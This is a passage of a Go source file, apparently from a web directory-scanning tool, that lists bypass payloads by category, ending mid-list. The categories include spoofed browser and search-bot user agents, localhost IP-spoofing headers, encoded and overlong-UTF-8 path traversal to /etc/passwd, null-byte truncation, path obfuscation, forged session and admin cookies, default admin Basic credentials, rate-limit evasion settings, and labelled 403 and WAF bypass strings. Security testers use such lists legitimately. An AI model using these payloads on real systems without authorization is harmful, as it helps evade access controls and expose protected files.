package payload

var dirUserAgentBypass = []Payload{
	{Raw: `Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36`, Description: "UA-Chrome120 Win", BypassType: DirBypassUserAgent},
	{Raw: `Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/121.0`, Description: "UA-Firefox121 Win", BypassType: DirBypassUserAgent},
	{Raw: `Mozilla/5.0 (Macintosh; Intel Mac OS X 14_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2 Safari/605.1.15`, Description: "UA-Safari17 Mac", BypassType: DirBypassUserAgent},
	{Raw: `Mozilla/5.0 (iPhone; CPU iPhone OS 17_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2 Mobile/15E148 Safari/604.1`, Description: "UA-iPhone Safari", BypassType: DirBypassUserAgent},
	{Raw: `Mozilla/5.0 (Linux; Android 14; Pixel 8 Pro) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.144 Mobile Safari/537.36`, Description: "UA-Pixel Chrome", BypassType: DirBypassUserAgent},
	{Raw: `Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36`, Description: "UA-Linux Chrome", BypassType: DirBypassUserAgent},
	{Raw: `Mozilla/5.0 (iPad; CPU OS 17_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2 Mobile/15E148 Safari/604.1`, Description: "UA-iPad Safari", BypassType: DirBypassUserAgent},
	{Raw: `Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0`, Description: "UA-Edge120", BypassType: DirBypassUserAgent},
	{Raw: `Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36`, Description: "UA-ChromeOS", BypassType: DirBypassUserAgent},
	{Raw: `Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36`, Description: "UA-Chrome119", BypassType: DirBypassUserAgent},
	{Raw: `Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36`, Description: "UA-Chrome119 Mac", BypassType: DirBypassUserAgent},
	{Raw: `Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0`, Description: "UA-Firefox120", BypassType: DirBypassUserAgent},
	{Raw: `Mozilla/5.0 (Macintosh; Intel Mac OS X 14.0; rv:120.0) Gecko/20100101 Firefox/120.0`, Description: "UA-Firefox120 Mac", BypassType: DirBypassUserAgent},
	{Raw: `Googlebot/2.1 (+http://www.google.com/bot.html)`, Description: "UA-GoogleBot", BypassType: DirBypassUserAgent},
	{Raw: `Googlebot/2.1 (+http://www.googlebot.com/bot.html)`, Description: "UA-GoogleBot2", BypassType: DirBypassUserAgent},
	{Raw: `Googlebot-Image/1.0`, Description: "UA-GoogleBot Image", BypassType: DirBypassUserAgent},
	{Raw: `Googlebot-Video/1.0`, Description: "UA-GoogleBot Video", BypassType: DirBypassUserAgent},
	{Raw: `Googlebot-News`, Description: "UA-GoogleBot News", BypassType: DirBypassUserAgent},
	{Raw: `AdsBot-Google (+http://www.google.com/adsbot.html)`, Description: "UA-Google AdsBot", BypassType: DirBypassUserAgent},
	{Raw: `Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)`, Description: "UA-GoogleBot Compat", BypassType: DirBypassUserAgent},
	{Raw: `Bingbot/2.0 (+http://www.bing.com/bingbot.htm)`, Description: "UA-BingBot", BypassType: DirBypassUserAgent},
	{Raw: `Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)`, Description: "UA-BingBot Compat", BypassType: DirBypassUserAgent},
	{Raw: `Baiduspider/2.0 (+http://www.baidu.com/search/spider.html)`, Description: "UA-BaiduSpider", BypassType: DirBypassUserAgent},
	{Raw: `Baiduspider+(+http://www.baidu.com/search/spider.htm)`, Description: "UA-BaiduSpider2", BypassType: DirBypassUserAgent},
	{Raw: `Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)`, Description: "UA-BaiduSpider Compat", BypassType: DirBypassUserAgent},
	{Raw: `Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm)`, Description: "UA-Sogou Spider", BypassType: DirBypassUserAgent},
	{Raw: `Sogou Pic Spider/3.0(+http://www.sogou.com/docs/help/webmasters.htm)`, Description: "UA-Sogou Pic", BypassType: DirBypassUserAgent},
	{Raw: `360Spider`, Description: "UA-360Spider", BypassType: DirBypassUserAgent},
	{Raw: `Mozilla/5.0 (compatible; 360Spider/2.0)`, Description: "UA-360Spider2", BypassType: DirBypassUserAgent},
	{Raw: `YisouSpider`, Description: "UA-YisouSpider", BypassType: DirBypassUserAgent},
	{Raw: `ShenmaSpider`, Description: "UA-ShenmaSpider", BypassType: DirBypassUserAgent},
	{Raw: `Slurp/3.0 (Yahoo! Slurp)`, Description: "UA-Yahoo Slurp", BypassType: DirBypassUserAgent},
	{Raw: `DuckDuckBot/1.0; (+http://duckduckgo.com/duckduckbot.html)`, Description: "UA-DuckDuckBot", BypassType: DirBypassUserAgent},
	{Raw: `facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)`, Description: "UA-Facebook Bot", BypassType: DirBypassUserAgent},
	{Raw: `facebookcatalog/1.0`, Description: "UA-Facebook Catalog", BypassType: DirBypassUserAgent},
	{Raw: `Twitterbot/1.0`, Description: "UA-TwitterBot", BypassType: DirBypassUserAgent},
	{Raw: `LinkedInBot/1.0 (+http://www.linkedin.com)`, Description: "UA-LinkedInBot", BypassType: DirBypassUserAgent},
	{Raw: `Applebot/0.1 (+http://www.apple.com/go/applebot)`, Description: "UA-AppleBot", BypassType: DirBypassUserAgent},
	{Raw: `Discordbot/2.0`, Description: "UA-DiscordBot", BypassType: DirBypassUserAgent},
	{Raw: `Slackbot-LinkExpanding 1.0 (+https://api.slack.com/robots)`, Description: "UA-SlackBot", BypassType: DirBypassUserAgent},
	{Raw: `Pinterest/0.2 (+http://www.pinterest.com/bot.html)`, Description: "UA-Pinterest", BypassType: DirBypassUserAgent},
	{Raw: `curl/7.88.1`, Description: "UA-curl", BypassType: DirBypassUserAgent},
	{Raw: `curl/8.4.0`, Description: "UA-curl8", BypassType: DirBypassUserAgent},
	{Raw: `Wget/1.21.4`, Description: "UA-wget", BypassType: DirBypassUserAgent},
	{Raw: `python-requests/2.31.0`, Description: "UA-python requests", BypassType: DirBypassUserAgent},
	{Raw: `python-urllib3/1.26.18`, Description: "UA-python urllib3", BypassType: DirBypassUserAgent},
	{Raw: `Go-http-client/2.0`, Description: "UA-Go HTTP", BypassType: DirBypassUserAgent},
	{Raw: `Go-http-client/1.1`, Description: "UA-Go HTTP 1.1", BypassType: DirBypassUserAgent},
	{Raw: `Apache-HttpClient/4.5.14`, Description: "UA-Apache HttpClient", BypassType: DirBypassUserAgent},
	{Raw: `okhttp/4.12.0`, Description: "UA-OkHttp", BypassType: DirBypassUserAgent},
	{Raw: `Dalvik/2.1.0 (Linux; U; Android 14; Pixel 8 Pro Build/UD1A)`, Description: "UA-Android Dalvik", BypassType: DirBypassUserAgent},
	{Raw: `Opera/9.80 (Windows NT 6.1; WOW64) Presto/2.12.388 Version/12.18`, Description: "UA-Opera12", BypassType: DirBypassUserAgent},
	{Raw: `Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 OPR/106.0.0.0`, Description: "UA-Opera106", BypassType: DirBypassUserAgent},
	{Raw: `Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)`, Description: "UA-YandexBot", BypassType: DirBypassUserAgent},
	{Raw: `Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)`, Description: "UA-AhrefsBot", BypassType: DirBypassUserAgent},
	{Raw: `Mozilla/5.0 (compatible; SemrushBot/7~bl; +http://www.semrush.com/bot.html)`, Description: "UA-SemrushBot", BypassType: DirBypassUserAgent},
	{Raw: `Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)`, Description: "UA-MJ12Bot", BypassType: DirBypassUserAgent},
	{Raw: `Mozilla/5.0 (compatible; DotBot/1.2; +https://opensiteexplorer.org/dotbot)`, Description: "UA-DotBot", BypassType: DirBypassUserAgent},
	{Raw: `ia_archiver`, Description: "UA-Alexa Bot", BypassType: DirBypassUserAgent},
	{Raw: `` + "\x00", Description: "UA-Null字节绕过", BypassType: DirBypassUserAgent},
}

var dirHeaderBypass = []Payload{
	{Raw: `X-Forwarded-For: 127.0.0.1`, Description: "Header-XFF local", BypassType: DirBypassHeader},
	{Raw: `X-Forwarded-For: 127.0.0.1, 127.0.0.1`, Description: "Header-XFF 双local", BypassType: DirBypassHeader},
	{Raw: `X-Forwarded-For: [::1]`, Description: "Header-XFF IPv6 local", BypassType: DirBypassHeader},
	{Raw: `X-Forwarded-For: 10.0.0.1`, Description: "Header-XFF 10段", BypassType: DirBypassHeader},
	{Raw: `X-Forwarded-For: 172.16.0.1`, Description: "Header-XFF 172段", BypassType: DirBypassHeader},
	{Raw: `X-Forwarded-For: 192.168.1.1`, Description: "Header-XFF 192段", BypassType: DirBypassHeader},
	{Raw: `X-Forwarded-For: 0.0.0.0`, Description: "Header-XFF 0.0.0.0", BypassType: DirBypassHeader},
	{Raw: `X-Forwarded-For: 0`, Description: "Header-XFF 0", BypassType: DirBypassHeader},
	{Raw: `X-Forwarded-For: localhost`, Description: "Header-XFF localhost", BypassType: DirBypassHeader},
	{Raw: `X-Forwarded-For: 2130706433`, Description: "Header-XFF 十进制127.0.0.1", BypassType: DirBypassHeader},
	{Raw: `X-Forwarded-For: 0177.0.0.01`, Description: "Header-XFF 八进制", BypassType: DirBypassHeader},
	{Raw: `X-Forwarded-For: 0x7f.0x0.0x0.0x1`, Description: "Header-XFF 十六进制", BypassType: DirBypassHeader},
	{Raw: `X-Forwarded-Host: localhost`, Description: "Header-XFH localhost", BypassType: DirBypassHeader},
	{Raw: `X-Forwarded-Host: 127.0.0.1`, Description: "Header-XFH IP", BypassType: DirBypassHeader},
	{Raw: `X-Forwarded-Proto: https`, Description: "Header-XFP https", BypassType: DirBypassHeader},
	{Raw: `X-Forwarded-Proto: http`, Description: "Header-XFP http", BypassType: DirBypassHeader},
	{Raw: `X-Real-IP: 127.0.0.1`, Description: "Header-X-Real-IP", BypassType: DirBypassHeader},
	{Raw: `X-Originating-IP: 127.0.0.1`, Description: "Header-X-Originating-IP", BypassType: DirBypassHeader},
	{Raw: `X-Remote-IP: 127.0.0.1`, Description: "Header-X-Remote-IP", BypassType: DirBypassHeader},
	{Raw: `X-Remote-Addr: 127.0.0.1`, Description: "Header-X-Remote-Addr", BypassType: DirBypassHeader},
	{Raw: `X-Client-IP: 127.0.0.1`, Description: "Header-X-Client-IP", BypassType: DirBypassHeader},
	{Raw: `X-Host: 127.0.0.1`, Description: "Header-X-Host", BypassType: DirBypassHeader},
	{Raw: `Client-IP: 127.0.0.1`, Description: "Header-Client-IP", BypassType: DirBypassHeader},
	{Raw: `Cluster-Client-IP: 127.0.0.1`, Description: "Header-Cluster-Client-IP", BypassType: DirBypassHeader},
	{Raw: `True-Client-IP: 127.0.0.1`, Description: "Header-True-Client-IP", BypassType: DirBypassHeader},
	{Raw: `CF-Connecting-IP: 127.0.0.1`, Description: "Header-CF-Connecting-IP", BypassType: DirBypassHeader},
	{Raw: `Fastly-Client-IP: 127.0.0.1`, Description: "Header-Fastly-Client-IP", BypassType: DirBypassHeader},
	{Raw: `X-ProxyUser-Ip: 127.0.0.1`, Description: "Header-X-ProxyUser-Ip", BypassType: DirBypassHeader},
	{Raw: `X-Forwarded-Server: localhost`, Description: "Header-X-Forwarded-Server", BypassType: DirBypassHeader},
	{Raw: `Accept: application/json`, Description: "Header-Accept JSON", BypassType: DirBypassHeader},
	{Raw: `Accept: application/xml`, Description: "Header-Accept XML", BypassType: DirBypassHeader},
	{Raw: `Accept: text/plain`, Description: "Header-Accept text", BypassType: DirBypassHeader},
	{Raw: `Accept-Language: en-US,en;q=0.9`, Description: "Header-Accept-Lang US", BypassType: DirBypassHeader},
	{Raw: `Accept-Encoding: gzip, deflate, br`, Description: "Header-Accept-Encoding", BypassType: DirBypassHeader},
	{Raw: `Connection: keep-alive`, Description: "Header-Connection", BypassType: DirBypassHeader},
	{Raw: `Via: 1.1 localhost`, Description: "Header-Via", BypassType: DirBypassHeader},
	{Raw: `Authorization: Basic YWRtaW46YWRtaW4=`, Description: "Header-Auth Basic admin", BypassType: DirBypassHeader},
	{Raw: `Authorization: Bearer null`, Description: "Header-Auth Bearer null", BypassType: DirBypassHeader},
	{Raw: `Content-Length: 0`, Description: "Header-Content-Length 0", BypassType: DirBypassHeader},
	{Raw: `Range: bytes=0-0`, Description: "Header-Range", BypassType: DirBypassHeader},
	{Raw: `X-Requested-With: XMLHttpRequest`, Description: "Header-XRH AJAX", BypassType: DirBypassHeader},
	{Raw: `Upgrade-Insecure-Requests: 1`, Description: "Header-Upgrade", BypassType: DirBypassHeader},
}

var dirEncodingBypass = []Payload{
	{Raw: `%61%64%6d%69%6e`, Description: "编码-URL编码admin", BypassType: DirBypassEncoding},
	{Raw: `%2e%2e%2f%61%64%6d%69%6e`, Description: "编码-../admin URL", BypassType: DirBypassEncoding},
	{Raw: `%252e%252e%252f%2561%2564%256d%2569%256e`, Description: "编码-双重URL编码admin", BypassType: DirBypassEncoding},
	{Raw: `%2e%2e/%2e%2e/%65%74%63/%70%61%73%73%77%64`, Description: "编码-路径遍历URL编码", BypassType: DirBypassEncoding},
	{Raw: `%uff0e%uff0e%u2215admin`, Description: "编码-Unicode全角编码", BypassType: DirBypassEncoding},
	{Raw: `%c0%ae%c0%ae%c0%afadmin`, Description: "编码-UTF-8超长编码", BypassType: DirBypassEncoding},
	{Raw: `%c0%ae%c0%ae/admin`, Description: "编码-UTF-8超长..", BypassType: DirBypassEncoding},
	{Raw: `%e0%80%ae%80%ae/admin`, Description: "编码-3字节超长UTF-8", BypassType: DirBypassEncoding},
	{Raw: `%f0%80%80%ae/admin`, Description: "编码-4字节超长UTF-8", BypassType: DirBypassEncoding},
	{Raw: `admin%00`, Description: "编码-Null字节截断", BypassType: DirBypassEncoding},
	{Raw: `admin%00.php`, Description: "编码-Null扩展名截断", BypassType: DirBypassEncoding},
	{Raw: `admin%2500`, Description: "编码-双重URL Null", BypassType: DirBypassEncoding},
	{Raw: `admin%20`, Description: "编码-尾部空格", BypassType: DirBypassEncoding},
	{Raw: `admin%09`, Description: "编码-尾部TAB", BypassType: DirBypassEncoding},
	{Raw: `admin%0a`, Description: "编码-尾部换行", BypassType: DirBypassEncoding},
	{Raw: `admin%0d`, Description: "编码-尾部回车", BypassType: DirBypassEncoding},
	{Raw: `admin%0d%0a`, Description: "编码-尾部CRLF", BypassType: DirBypassEncoding},
	{Raw: `admin%c0%2f`, Description: "编码-斜杠UTF-8超长", BypassType: DirBypassEncoding},
	{Raw: `admin%ef%bc%8f`, Description: "编码-斜杠全角", BypassType: DirBypassEncoding},
	{Raw: `admin.`, Description: "编码-尾部点号", BypassType: DirBypassEncoding},
	{Raw: `admin.aspx`, Description: "编码-添加aspx", BypassType: DirBypassEncoding},
	{Raw: `admin.jsp`, Description: "编码-添加JSP", BypassType: DirBypassEncoding},
	{Raw: `admin.php`, Description: "编码-添加PHP", BypassType: DirBypassEncoding},
	{Raw: `admin.asp`, Description: "编码-添加ASP", BypassType: DirBypassEncoding},
	{Raw: `admin.cfm`, Description: "编码-添加CFM", BypassType: DirBypassEncoding},
	{Raw: `%u002e%u002e/admin`, Description: "编码-Unicode点号", BypassType: DirBypassEncoding},
	{Raw: `%u002e%u002e/%u002e%u002e/etc/passwd`, Description: "编码-Unicode全路径遍历", BypassType: DirBypassEncoding},
}

var dirCaseBypass = []Payload{
	{Raw: `ADMIN`, Description: "大小写-全大写admin", BypassType: DirBypassCase},
	{Raw: `Admin`, Description: "大小写-首字母大写", BypassType: DirBypassCase},
	{Raw: `AdMiN`, Description: "大小写-混合大小写", BypassType: DirBypassCase},
	{Raw: `aDmIn`, Description: "大小写-交替大小写", BypassType: DirBypassCase},
	{Raw: `WEB-INF`, Description: "大小写-大写WEB-INF", BypassType: DirBypassCase},
	{Raw: `Web-Inf`, Description: "大小写-Web-Inf", BypassType: DirBypassCase},
	{Raw: `web-inf`, Description: "大小写-小写web-inf", BypassType: DirBypassCase},
	{Raw: `WEB.XML`, Description: "大小写-大写WEB.XML", BypassType: DirBypassCase},
	{Raw: `web.xml`, Description: "大小写-小写web.xml", BypassType: DirBypassCase},
	{Raw: `WEB-INF/web.XML`, Description: "大小写-混合路径", BypassType: DirBypassCase},
	{Raw: `.htAccess`, Description: "大小写-htAccess", BypassType: DirBypassCase},
	{Raw: `.HTACCESS`, Description: "大小写-Htaccess", BypassType: DirBypassCase},
	{Raw: `GIThub`, Description: "大小写-Github", BypassType: DirBypassCase},
	{Raw: `GiTlaB`, Description: "大小写-Gitlab", BypassType: DirBypassCase},
	{Raw: `WP-ADMIN`, Description: "大小写-WP-ADMIN", BypassType: DirBypassCase},
	{Raw: `Wp-ConTent`, Description: "大小写-Wp-ConTent", BypassType: DirBypassCase},
	{Raw: `PHPmYAdMin`, Description: "大小写-PHPmYAdMin", BypassType: DirBypassCase},
}

var dirRateLimitBypass = []Payload{
	{Raw: `DELAY:10`, Description: "频率-10ms延迟", BypassType: DirBypassRateLimit},
	{Raw: `DELAY:25`, Description: "频率-25ms延迟", BypassType: DirBypassRateLimit},
	{Raw: `DELAY:50`, Description: "频率-50ms延迟", BypassType: DirBypassRateLimit},
	{Raw: `DELAY:75`, Description: "频率-75ms延迟", BypassType: DirBypassRateLimit},
	{Raw: `DELAY:100`, Description: "频率-100ms延迟", BypassType: DirBypassRateLimit},
	{Raw: `DELAY:150`, Description: "频率-150ms延迟", BypassType: DirBypassRateLimit},
	{Raw: `DELAY:200`, Description: "频率-200ms延迟", BypassType: DirBypassRateLimit},
	{Raw: `DELAY:300`, Description: "频率-300ms延迟", BypassType: DirBypassRateLimit},
	{Raw: `DELAY:500`, Description: "频率-500ms延迟", BypassType: DirBypassRateLimit},
	{Raw: `DELAY:750`, Description: "频率-750ms延迟", BypassType: DirBypassRateLimit},
	{Raw: `DELAY:1000`, Description: "频率-1000ms延迟", BypassType: DirBypassRateLimit},
	{Raw: `DELAY:2000`, Description: "频率-2000ms延迟", BypassType: DirBypassRateLimit},
	{Raw: `DELAY:5000`, Description: "频率-5000ms延迟", BypassType: DirBypassRateLimit},
	{Raw: `DELAY:RANDOM 10-100`, Description: "频率-随机10-100ms", BypassType: DirBypassRateLimit},
	{Raw: `DELAY:RANDOM 100-500`, Description: "频率-随机100-500ms", BypassType: DirBypassRateLimit},
	{Raw: `DELAY:RANDOM 500-2000`, Description: "频率-随机500-2000ms", BypassType: DirBypassRateLimit},
	{Raw: `DELAY:RANDOM 1000-5000`, Description: "频率-随机1000-5000ms", BypassType: DirBypassRateLimit},
	{Raw: `CONCURRENT:1`, Description: "频率-单线程", BypassType: DirBypassRateLimit},
	{Raw: `CONCURRENT:2`, Description: "频率-2线程", BypassType: DirBypassRateLimit},
	{Raw: `CONCURRENT:3`, Description: "频率-3线程", BypassType: DirBypassRateLimit},
	{Raw: `CONCURRENT:5`, Description: "频率-5线程", BypassType: DirBypassRateLimit},
	{Raw: `CONCURRENT:10`, Description: "频率-10线程", BypassType: DirBypassRateLimit},
	{Raw: `JITTER:0.1`, Description: "频率-10%抖动", BypassType: DirBypassRateLimit},
	{Raw: `JITTER:0.3`, Description: "频率-30%抖动", BypassType: DirBypassRateLimit},
	{Raw: `JITTER:0.5`, Description: "频率-50%抖动", BypassType: DirBypassRateLimit},
	{Raw: `BACKOFF:2`, Description: "频率-指数退避2x", BypassType: DirBypassRateLimit},
	{Raw: `BACKOFF:1.5`, Description: "频率-线性退避1.5x", BypassType: DirBypassRateLimit},
}

var dirPathObfuscationBypass = []Payload{
	{Raw: `/./admin`, Description: "路径混淆-./admin", BypassType: DirBypassPathObfuscation},
	{Raw: `/.//admin`, Description: "路径混淆-单斜杠", BypassType: DirBypassPathObfuscation},
	{Raw: `/././admin`, Description: "路径混淆-双./admin", BypassType: DirBypassPathObfuscation},
	{Raw: `//admin`, Description: "路径混淆-双斜杠前缀", BypassType: DirBypassPathObfuscation},
	{Raw: `///admin`, Description: "路径混淆-三斜杠前缀", BypassType: DirBypassPathObfuscation},
	{Raw: `/..;/admin`, Description: "路径混淆-分号截断", BypassType: DirBypassPathObfuscation},
	{Raw: `/.;/admin`, Description: "路径混淆-点分号", BypassType: DirBypassPathObfuscation},
	{Raw: `/.../admin`, Description: "路径混淆-三点", BypassType: DirBypassPathObfuscation},
	{Raw: `/..../admin`, Description: "路径混淆-四点", BypassType: DirBypassPathObfuscation},
	{Raw: `admin/.`, Description: "路径混淆-尾部点", BypassType: DirBypassPathObfuscation},
	{Raw: `admin/./`, Description: "路径混淆-尾部./", BypassType: DirBypassPathObfuscation},
	{Raw: `admin/.//`, Description: "路径混淆-尾部.//", BypassType: DirBypassPathObfuscation},
	{Raw: `admin;/`, Description: "路径混淆-分号斜杆", BypassType: DirBypassPathObfuscation},
	{Raw: `admin%3b/`, Description: "路径混淆-URL分号", BypassType: DirBypassPathObfuscation},
	{Raw: `admin%3f`, Description: "路径混淆-问号URL", BypassType: DirBypassPathObfuscation},
	{Raw: `admin%23`, Description: "路径混淆-井号URL", BypassType: DirBypassPathObfuscation},
	{Raw: `admin%2f`, Description: "路径混淆-斜杠URL", BypassType: DirBypassPathObfuscation},
	{Raw: `admin..;/`, Description: "路径混淆-双点分号斜杠", BypassType: DirBypassPathObfuscation},
	{Raw: `admin.json`, Description: "路径混淆-添加.json", BypassType: DirBypassPathObfuscation},
	{Raw: `admin.html`, Description: "路径混淆-添加.html", BypassType: DirBypassPathObfuscation},
	{Raw: `admin.xml`, Description: "路径混淆-添加.xml", BypassType: DirBypassPathObfuscation},
	{Raw: `admin.tar.gz`, Description: "路径混淆-添加.tar.gz", BypassType: DirBypassPathObfuscation},
	{Raw: `admin.zip`, Description: "路径混淆-添加.zip", BypassType: DirBypassPathObfuscation},
	{Raw: `admin.bak`, Description: "路径混淆-添加.bak", BypassType: DirBypassPathObfuscation},
	{Raw: `admin.old`, Description: "路径混淆-添加.old", BypassType: DirBypassPathObfuscation},
	{Raw: `admin.orig`, Description: "路径混淆-添加.orig", BypassType: DirBypassPathObfuscation},
	{Raw: `admin.swp`, Description: "路径混淆-添加.swp", BypassType: DirBypassPathObfuscation},
	{Raw: `admin~`, Description: "路径混淆-添加~", BypassType: DirBypassPathObfuscation},
	{Raw: `admin#`, Description: "路径混淆-添加#", BypassType: DirBypassPathObfuscation},
	{Raw: `/admin?`, Description: "路径混淆-问号", BypassType: DirBypassPathObfuscation},
	{Raw: `/admin?debug=1`, Description: "路径混淆-问号+debug", BypassType: DirBypassPathObfuscation},
	{Raw: `/admin#test`, Description: "路径混淆-井号片段", BypassType: DirBypassPathObfuscation},
	{Raw: `/ADMIN`, Description: "路径混淆-大写路径", BypassType: DirBypassPathObfuscation},
	{Raw: `/aDmIN`, Description: "路径混淆-混合大写路径", BypassType: DirBypassPathObfuscation},
	{Raw: `//admin//`, Description: "路径混淆-双斜杠包围", BypassType: DirBypassPathObfuscation},
	{Raw: `/%2fadmin`, Description: "路径混淆-编码斜杠前缀", BypassType: DirBypassPathObfuscation},
	{Raw: `/admin%2f`, Description: "路径混淆-编码斜杠后缀", BypassType: DirBypassPathObfuscation},
	{Raw: `/admin%5c`, Description: "路径混淆-反斜杠URL编码", BypassType: DirBypassPathObfuscation},
	{Raw: `admin%5c`, Description: "路径混淆-反斜杠URL无前缀", BypassType: DirBypassPathObfuscation},
}

var dirMethodBypass = []Payload{
	{Raw: `METHOD:GET`, Description: "方法-GET", BypassType: DirBypassMethod},
	{Raw: `METHOD:POST`, Description: "方法-POST", BypassType: DirBypassMethod},
	{Raw: `METHOD:HEAD`, Description: "方法-HEAD", BypassType: DirBypassMethod},
	{Raw: `METHOD:OPTIONS`, Description: "方法-OPTIONS", BypassType: DirBypassMethod},
	{Raw: `METHOD:PUT`, Description: "方法-PUT", BypassType: DirBypassMethod},
	{Raw: `METHOD:PATCH`, Description: "方法-PATCH", BypassType: DirBypassMethod},
	{Raw: `METHOD:TRACE`, Description: "方法-TRACE", BypassType: DirBypassMethod},
	{Raw: `METHOD:DELETE`, Description: "方法-DELETE", BypassType: DirBypassMethod},
	{Raw: `METHOD:CONNECT`, Description: "方法-CONNECT", BypassType: DirBypassMethod},
	{Raw: `METHOD:PROPFIND`, Description: "方法-PROPFIND WebDAV", BypassType: DirBypassMethod},
	{Raw: `METHOD:PROPPATCH`, Description: "方法-PROPPATCH WebDAV", BypassType: DirBypassMethod},
	{Raw: `METHOD:MKCOL`, Description: "方法-MKCOL WebDAV", BypassType: DirBypassMethod},
	{Raw: `METHOD:COPY`, Description: "方法-COPY WebDAV", BypassType: DirBypassMethod},
	{Raw: `METHOD:MOVE`, Description: "方法-MOVE WebDAV", BypassType: DirBypassMethod},
	{Raw: `METHOD:LOCK`, Description: "方法-LOCK WebDAV", BypassType: DirBypassMethod},
	{Raw: `METHOD:UNLOCK`, Description: "方法-UNLOCK WebDAV", BypassType: DirBypassMethod},
}

var dirRefererBypass = []Payload{
	{Raw: `REFERER:https://www.google.com/`, Description: "Referer-Google", BypassType: DirBypassReferer},
	{Raw: `REFERER:https://www.baidu.com/`, Description: "Referer-百度", BypassType: DirBypassReferer},
	{Raw: `REFERER:https://github.com/`, Description: "Referer-GitHub", BypassType: DirBypassReferer},
	{Raw: `REFERER:https://admin.example.com/`, Description: "Referer-同源管理页面", BypassType: DirBypassReferer},
	{Raw: `REFERER:https://localhost/`, Description: "Referer-localhost", BypassType: DirBypassReferer},
	{Raw: `REFERER:`, Description: "Referer-空Referer", BypassType: DirBypassReferer},
}

var dirCookieBypass = []Payload{
	{Raw: `COOKIE:session=admin123`, Description: "Cookie-伪造session", BypassType: DirBypassCookie},
	{Raw: `COOKIE:token=eyJhZG1pbiI6dHJ1ZX0=`, Description: "Cookie-伪造token", BypassType: DirBypassCookie},
	{Raw: `COOKIE:admin=true;role=admin`, Description: "Cookie-伪造admin角色", BypassType: DirBypassCookie},
	{Raw: `COOKIE:PHPSESSID=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa`, Description: "Cookie-伪造PHP Session", BypassType: DirBypassCookie},
	{Raw: `COOKIE:JSESSIONID=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA`, Description: "Cookie-伪造Java Session", BypassType: DirBypassCookie},
	{Raw: `COOKIE:auth=1;uid=1`, Description: "Cookie-伪造认证Cookie", BypassType: DirBypassCookie},
}

var dirParamBypass = []Payload{
	{Raw: `?debug=true`, Description: "参数-debug", BypassType: DirBypassParam},
	{Raw: `?admin=true`, Description: "参数-admin", BypassType: DirBypassParam},
	{Raw: `?test=1`, Description: "参数-test", BypassType: DirBypassParam},
	{Raw: `?id=1`, Description: "参数-id", BypassType: DirBypassParam},
	{Raw: `?page=1`, Description: "参数-page", BypassType: DirBypassParam},
	{Raw: `?show=all`, Description: "参数-show", BypassType: DirBypassParam},
	{Raw: `?format=json`, Description: "参数-format", BypassType: DirBypassParam},
	{Raw: `?.json`, Description: "参数-.json后缀", BypassType: DirBypassParam},
	{Raw: `?.xml`, Description: "参数-.xml后缀", BypassType: DirBypassParam},
	{Raw: `?callback=test`, Description: "参数-callback JSONP", BypassType: DirBypassParam},
	{Raw: `?alt=json`, Description: "参数-alt=json", BypassType: DirBypassParam},
	{Raw: `#`, Description: "参数-井号截断", BypassType: DirBypassParam},
	{Raw: `#/admin`, Description: "参数-井号+路径", BypassType: DirBypassParam},
}

var dirSecurityBypass = []Payload{
	{Raw: `SECURITY:403BYPASS /admin;/`, Description: "安全-403绕过分号斜杠", BypassType: DirBypassHeader},
	{Raw: `SECURITY:403BYPASS /admin%2f`, Description: "安全-403绕过%2f", BypassType: DirBypassHeader},
	{Raw: `SECURITY:403BYPASS /admin%2e`, Description: "安全-403绕过%2e", BypassType: DirBypassHeader},
	{Raw: `SECURITY:403BYPASS /admin..;/`, Description: "安全-403绕过..;/", BypassType: DirBypassHeader},
	{Raw: `SECURITY:403BYPASS /.%2e/admin`, Description: "安全-403绕过.%2e", BypassType: DirBypassHeader},
	{Raw: `SECURITY:403BYPASS /admin%00`, Description: "安全-403绕过%00", BypassType: DirBypassHeader},
	{Raw: `SECURITY:401BYPASS %00`, Description: "安全-401绕过%00", BypassType: DirBypassHeader},
	{Raw: `SECURITY:WAFBYPASS %u002f`, Description: "安全-WAF绕过%u002f", BypassType: DirBypassHeader},
	{Raw: `SECURITY:WAFBYPASS %u2215`, Description: "安全-WAF绕过%u2215", BypassType: DirBypassHeader},
	{Raw: `SECURITY:WAFBYPASS %c0%af`, Description: "安全-WAF绕过%c0%af", BypassType: DirBypassHeader},
	{Raw: `SECURITY:WAFBYPASS %e0%80%af`, Description: "安全-WAF绕过%e0%80%af", BypassType: DirBypassHeader},
	{Raw: `SECURITY:WAFBYPASS %252f`, Description: "安全-WAF绕过%252f", BypassType: DirBypassHeader},
